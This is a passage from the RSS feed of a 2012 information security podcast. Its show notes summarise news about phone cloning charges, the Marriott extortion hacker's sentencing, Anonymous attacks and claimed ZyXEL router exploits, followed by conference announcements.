	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">U.S. Secret Service&rsquo;s New York Field Office recently investigated a sophisticated operation in which information from the cell phone accounts of tens of thousands of people is stolen to support a black market in international calling.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;These charges show our commitment to protecting the privacy of consumers and safeguarding the integrity of international telecommunications networks,&rdquo; said Manhattan U.S. Attorney Preet Bharara.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Secret Service is recognized worldwide for its investigative expertise and for its aggressive and innovative approach to the detection, investigation and prevention of financial crimes. &nbsp;While payment methods have changed over the years &ndash; from coin and paper currency, to checks, credit cards, and now, online transactions &ndash; the Secret Service remains committed to safeguarding the payment and financial systems of the United States.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Through the use of strong investigative techniques and practices, the Secret Service and its law enforcement partners in multiple jurisdictions successfully thwarted further criminal activity and brought these perpetrators to justice,&rdquo; said Brian Parr, Special Agent in Charge of the Secret Service&rsquo;s New York Field Office.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.theregister.co.uk/2012/02/06/marriott_hacker_jailed/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2012/02/06/marriott_hacker_jailed/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.computerworld.com/s/article/9223971/Hungarian_hacker_gets_30_months_for_extortion_plot_on_Marriott?taxonomyId=17"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9223971/Hungarian_hacker_gets_30_months_for_extortion_plot_on_Marriott?taxonomyId=17</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attila Nemeth has been sentenced to 30 months in prison for hacking into the a computer system belonging to Marriott International Inc. Nemeth broke into the system in 2010 and notified Marriott officials that he had stolen proprietary data, sending eight documents along as proof. An investigation revealed that Nemeth had placed two Trojan horse programs on a Marriott system through a spear phishing email attack. Nemeth threatened to share the stolen information with Marriott competitors or employees if he was not offered a job. Nemeth was lured to the US by a Secret Service agent posing as a Marriott IT executive, who asked him to come for an interview.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.bbc.co.uk/news/world-us-canada-16881582"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.bbc.co.uk/news/world-us-canada-16881582</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.wired.com/threatlevel/2012/02/anonymous-scotland-yard/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.wired.com/threatlevel/2012/02/anonymous-scotland-yard/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.scmagazine.com/fbi-call-gives-clues-into-anonymous-lulzsec-probes/article/226231/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.scmagazine.com/fbi-call-gives-clues-into-anonymous-lulzsec-probes/article/226231/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The FBI is investigating how hackers linked to the Anonymous group managed to gain access to a phone call between law enforcement agents in Britain and the UK during which they discussed taking legal action against the group. Anonymous has released a recording of the call. The call reportedly took place on January 17; a lawyer for one of the people</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">who was mentioned in the call said it appears to have been taken from intercepted email.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.siliconrepublic.com/strategy/item/25687-hacker-claims-most-dsl-mode"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.siliconrepublic.com/strategy/item/25687-hacker-claims-most-dsl-mode</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A software developer and amateur hacker has claimed the existence of exploits for wireless routers currently used by Eircom that theoretically would allow hackers who know what they are doing to break into their neighbours&rsquo; wireless networks.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a</span><a href="http://insanitypop.com/articles-and-posts/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> blog published this morning</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, software developer Ross Canpolet referred to an exploit called RouterPWN v:1.3.138 that allows several methods of hacking routers and modems, such as Eircom&rsquo;s popular ZyXEL P-660.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;I can confirm that the ZyXEL p-660HW-T1 v3 model running v3.70 (BOE.2) D0 | 03/01/2010 can be targeted and exploited,&rdquo; Canpolet wrote.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Canpolet confirmed to Siliconrepublic.com that he has warned Eircom of the issue so that the operator can fix it.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">He pointed out that the ZyXEL exploits, known in hacker terminology as &ldquo;pwnage&rdquo;, allow hackers to change and create an admin password, enable local admin logins, restart the device at will, change the router firmware and reset the device to factory settings, among quite a few things.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Canpolet said the vast majority of DSL broadband connections in the country can be theoretically hit by &ldquo;pwnage&rdquo; attacks.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">He says the methods of obtaining a user&rsquo;s IP address are endless and pwnage exploits are easily accessible online.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://bostonherald.com/news/regional/view/20220208anonymous_message_hacker_group_bpd_will_pay_for_occupy_eviction"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://bostonherald.com/news/regional/view/20220208anonymous_message_hacker_group_bpd_will_pay_for_occupy_eviction</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Internet vigilante group Anonymous refuses to give up on its stranglehold of the Boston police website and is likely to strike again in revenge for cops evicting Occupy campers from Dewey Square, a man who claims to be the unofficial spokesman for the hacker collective told the Herald yesterday.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;They&rsquo;re mad. &#8230; They&rsquo;ve proven the point that they can get into your networks and do things,&rdquo; said Gregg Housh, a former member of Anonymous from Malden.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;At any given moment, anyone can get on the (chat) and say, &lsquo;We should attack this site and I&rsquo;ve found a vulnerability,&rsquo; &rdquo; Housh said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;It could just be one single person out there who has never even done anything with Anonymous saying, &lsquo;You should hit this.&rsquo; &#8230; All of the major attacks followed some form of injustice in their eye, and boom, they go after them.&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Housh warned that Anonymous saboteurs all over the world &mdash; from China to Europe &mdash; are itching for the opportunity to punish the police for evicting Occupy Boston campers from downtown Dec. 10.<br class="kix-line-break" /><br />
	&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Housh said Anonymous bandwidth bandits hit Friday when they took control of BPDnews.com &mdash; the police website devoted to community policing &mdash; when chatter targeting Boston picked up.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This Friday could bring even more chaos, he added, as Anonymous has warned they will wreak more wired havoc.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Housh said police called him Friday seeking help in the aftermath of the hack.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Boston police spokeswoman Elaine Driscoll declined to confirm his story, but she did say federal investigators have been brought in to assist.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Driscoll and community activists said shutting down BPD news has crippled one of the city&rsquo;s key crime-fighting tools.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;For more than six years now, BPDNews has been a valuable resource for community members,&rdquo; Driscoll said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;It is unfortunate that these individuals would deprive the community of this important information outlet. We appreciate everyone&rsquo;s continued patience and again apologize for the convenience.&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-590-cell-cloning-marriott-hacker-anonymous-irish-dsl-modems-bostonpd/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3485/0/infosec-daily-podcast-episode-590.mp3" length="18407636" type="audio/mpeg" />
		<itunes:duration>0:38:18</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 590 for February 9, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.
	[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 590 for February 9, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;http://blog.dhs.gov/2012/02/secret-service-investigates.html&#160;&#160;&#160; 
	On February 1, the U.S. Attorney for the Southern District of New York announced charges against 12 defendants for participating in a $250 million cell phone cloning scheme.
	U.S. Secret Service&#8217;s New York Field Office recently investigated a sophisticated operation in which information from the cell phone accounts of tens of thousands of people is stolen to support a black market in international calling.
	&#8220;These charges show our commitment to protecting the privacy of consumers and safeguarding the integrity of international telecommunications networks,&#8221; said Manhattan U.S. Attorney Preet Bharara.
	&#160;&#160;&#160; 
	The Secret Service is recognized worldwide for its investigative expertise and for its aggressive and innovative approach to the detection, investigation and prevention of financial crimes. &#160;While payment methods have changed over the years &#8211; from coin and paper currency, to checks, credit cards, and now, online transactions &#8211; the Secret Service remains committed to safeguarding the payment and financial systems of the United States.
	&#160;&#160;&#160; 
	&#8220;Through the use of strong investigative techniques and practices, the Secret Service and its law enforcement partners in multiple jurisdictions successfully thwarted further criminal activity and brought these perpetrators to justice,&#8221; said Brian Parr, Special Agent in Charge of the Secret Service&#8217;s New York Field Offi[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 589 &#8211; Not So Anonymous, Indiana Malware, Non-Secure Wireless &amp; TSA Manage your Security?</title>
		<link>http://www.isdpodcast.com/episode-589-not-so-anonymous-indiana-malware-non-secure-wireless-tsa-manage-your-security</link>
		<comments>http://www.isdpodcast.com/episode-589-not-so-anonymous-indiana-malware-non-secure-wireless-tsa-manage-your-security#comments</comments>
		<pubDate>Thu, 09 Feb 2012 01:45:09 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3480</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 589 for February 8, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan. &#160; Announcements: Unsung Heroes Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 589 for February 8, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heroes</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
